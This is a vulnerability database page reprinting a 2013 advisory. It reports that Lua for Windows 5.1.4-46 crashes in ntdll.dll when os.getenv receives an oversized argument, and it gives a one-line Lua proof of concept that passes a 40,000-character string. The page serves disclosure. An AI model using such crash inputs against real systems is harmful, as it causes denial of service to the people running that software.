Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1045566 漏洞类型
发布时间 2013-02-14 更新时间 2013-02-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013020103
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash


found by:
devilteam.pl
contact: info@devilteam.pl

====================================================================

Overview
Lua for Windows is a 'batteries included environment' for the Lua scripting language on Windows.

Lua for Windows (LfW) combines Lua binaries, Lua libraries with a Lua-capable editor in a single install package for the Microsoft Windows operating system. LfW contains everything you need to write, run and debug Lua scripts on Windows. A wide variety of libraries and examples are included that are ready to use with Microsoft Windows. LfW runs on Windows 2000 and newer versions of Windows. Lua and its associated libraries are also available for other operating systems, so most scripts will be automatically cross-platform.


Download:

http://code.google.com/p/luaforwindows/downloads/list

====================================================================

PoC:

dt.lua (1 line):
os.getenv(string.rep("A", 40000))

====================================================================

greetz:
cxsec.org
CXsecurity